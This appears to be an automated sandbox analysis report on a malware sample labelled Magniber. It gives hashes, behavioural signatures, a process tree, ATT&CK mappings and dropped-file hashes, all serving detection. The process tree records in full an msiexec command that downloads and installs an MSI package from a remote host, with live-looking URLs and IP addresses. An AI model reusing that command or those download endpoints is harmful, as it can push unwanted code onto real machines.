e7f9be68e4fc06cf40aaee81db4d90358212b914f9b3b857b2bb39890b09807c

General

Target

2024-08-12_51dc4b03b865d10263e8ff0c81ad3dd7_magniber.exe
Size

1.4MB
MD5

51dc4b03b865d10263e8ff0c81ad3dd7
SHA1

7ecf48489754d42da25f967b8d1fafe31233ed8d
SHA256

e7f9be68e4fc06cf40aaee81db4d90358212b914f9b3b857b2bb39890b09807c
SHA512

b8608fb1b7bb3aa80134b2a1c26007e6a2c0a0ccf70e7d9f7fa5734a07cbfada9eb5537508a087e13be62e341152be0683aad746080bebfd78e12693d64439e6
SSDEEP

24576:0aQYOVsNdVSau7IzCPI9uRN5O/Jn5ks/4JH2NCfXYi5n7iPMV:0adhu7IMI9MzynT1NcQMV

Score

7^/10

discovery

Malware Config

Signatures

Executes dropped EXE 1 IoCs

pid	Process
316	~o8oh3n87up.tmp

Use of msiexec (install) with remote resource 1 IoCs

pid	Process
1240	MSIEXEC.EXE

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2024-08-12_51dc4b03b865d10263e8ff0c81ad3dd7_magniber.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	~o8oh3n87up.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSIEXEC.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1240	MSIEXEC.EXE
Token: SeIncreaseQuotaPrivilege	1240	MSIEXEC.EXE

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
1240	MSIEXEC.EXE
1240	MSIEXEC.EXE

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3868 wrote to memory of 316	3868	2024-08-12_51dc4b03b865d10263e8ff0c81ad3dd7_magniber.exe	84
PID 3868 wrote to memory of 316	3868	2024-08-12_51dc4b03b865d10263e8ff0c81ad3dd7_magniber.exe	84
PID 3868 wrote to memory of 316	3868	2024-08-12_51dc4b03b865d10263e8ff0c81ad3dd7_magniber.exe	84
PID 316 wrote to memory of 1240	316	~o8oh3n87up.tmp	88
PID 316 wrote to memory of 1240	316	~o8oh3n87up.tmp	88
PID 316 wrote to memory of 1240	316	~o8oh3n87up.tmp	88

C:\Users\Admin\AppData\Local\Temp\2024-08-12_51dc4b03b865d10263e8ff0c81ad3dd7_magniber.exe
"C:\Users\Admin\AppData\Local\Temp\2024-08-12_51dc4b03b865d10263e8ff0c81ad3dd7_magniber.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3868
- C:\Users\Admin\AppData\Local\Temp\~o8oh3n87up.tmp
  "C:\Users\Admin\AppData\Local\Temp\~o8oh3n87up.tmp"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:316
- - C:\Windows\SysWOW64\MSIEXEC.EXE
    MSIEXEC.EXE /i "http://clatz.fileslldl.eu/client/pkgs/winpalace/WinPalace20150310084937.msi" DDC_DID=7187357 DDC_RTGURL=http://www.filecdn.eu/dl/TrackSetup/TrackSetup.aspx?DID=7187357 DDC_DOWNLOAD_AFFID=48734 DDC_UPDATESTATUSURL=http://190.4.91.3:8080/winpalace/Lobby.WebServices/Installer.asmx DDC_SIGNUPURL=http://190.4.91.3:8080/winpalace/Lobby.WebSite/SignUpUnsecure.aspx CUSTOMNAME02=redirectAsData CUSTOMVALUE02=1 CUSTOMNAME03=remoteIP CUSTOMVALUE03=107.178.200.195 CUSTOMNAME04=name CUSTOMNAME05=email CUSTOMNAME06=redirect CUSTOMNAME07=version CUSTOMVALUE07=100 CUSTOMNAME08=camefrom CUSTOMNAME09=adid CUSTOMVALUE09=NULL CUSTOMNAME10=affreferrer SETUPEXEDIR="C:\Users\Admin\AppData\Local\Temp" SETUPEXENAME="~o8oh3n87up.tmp"
    3⤵
    - Use of msiexec (install) with remote resource
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    PID:1240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_is737F.tmp

Filesize
1KB

MD5
ad43161c35085668fe2e06cc162456cf

SHA1
988667590367a11a34f547d9989c3df0de5ffbb4

SHA256
280d79cab0bf91fd706289b530f59d521d350ff3e9626f4873caa94d3bc86c90

SHA512
59d712df4a6e9034908c963d5e48d47c40e6da7c191a33e3a84cf2141b66271841c9d5ffbdf64f13ccaf41b9dd70ff1a95e8cc5445025d3b5fe526760e070f4c

Download Submit
C:\Users\Admin\AppData\Local\Temp\{0D7B91C4-AB4B-461D-9388-2695F7040ABA}\0x0409.ini

Filesize
21KB

MD5
be345d0260ae12c5f2f337b17e07c217

SHA1
0976ba0982fe34f1c35a0974f6178e15c238ed7b

SHA256
e994689a13b9448c074f9b471edeec9b524890a0d82925e98ab90b658016d8f3

SHA512
77040dbee29be6b136a83b9e444d8b4f71ff739f7157e451778fb4fccb939a67ff881a70483de16bcb6ae1fea64a89e00711a33ec26f4d3eea8e16c9e9553eff

Download Submit
C:\Users\Admin\AppData\Local\Temp\{0D7B91C4-AB4B-461D-9388-2695F7040ABA}\_ISMSIDEL.INI

Filesize
20B

MD5
db9af7503f195df96593ac42d5519075

SHA1
1b487531bad10f77750b8a50aca48593379e5f56

SHA256
0a33c5dffabcf31a1f6802026e9e2eef4b285e57fd79d52fdcd98d6502d14b13

SHA512
6839264e14576fe190260a4b82afc11c88e50593a20113483851bf4abfdb7cca9986bef83f4c6b8f98ef4d426f07024cf869e8ab393df6d2b743b9b8e2544e1b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~737C.tmp

Filesize
6KB

MD5
ee9c9cb75277c513daef27008aac3be3

SHA1
0a9347085064c19e073f59566a635af7c96bed37

SHA256
e5d31e99002845d29d4032d22e8b165400705e9629c310dc044217568c16351e

SHA512
943f00802654f108b3d9297cd352ca5bec8e3fac202459962fdc258f1a4c7762e44bb11440d334c177e3da78d59cf050c383a779be83f40015b05d9e78edadb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\~o8oh3n87up.tmp

Filesize
1.2MB

MD5
748577e4dc2ede007b4297eb1765ac8d

SHA1
ad06413330855606a8dd578d213ca521551a3e42

SHA256
f80ca09211b797ebef8b9aafc7e6225e2c81b95b8b9169bd07e6a6646cfa2a62

SHA512
2e6cc1798e85013f29b078a918067069f0105f9434493609168eccc4fac67a8c068866934942c861a3701f9ce564080c2f82927255e6d190460d25b07e06cbb4

Download Submit

Analysis

Sharing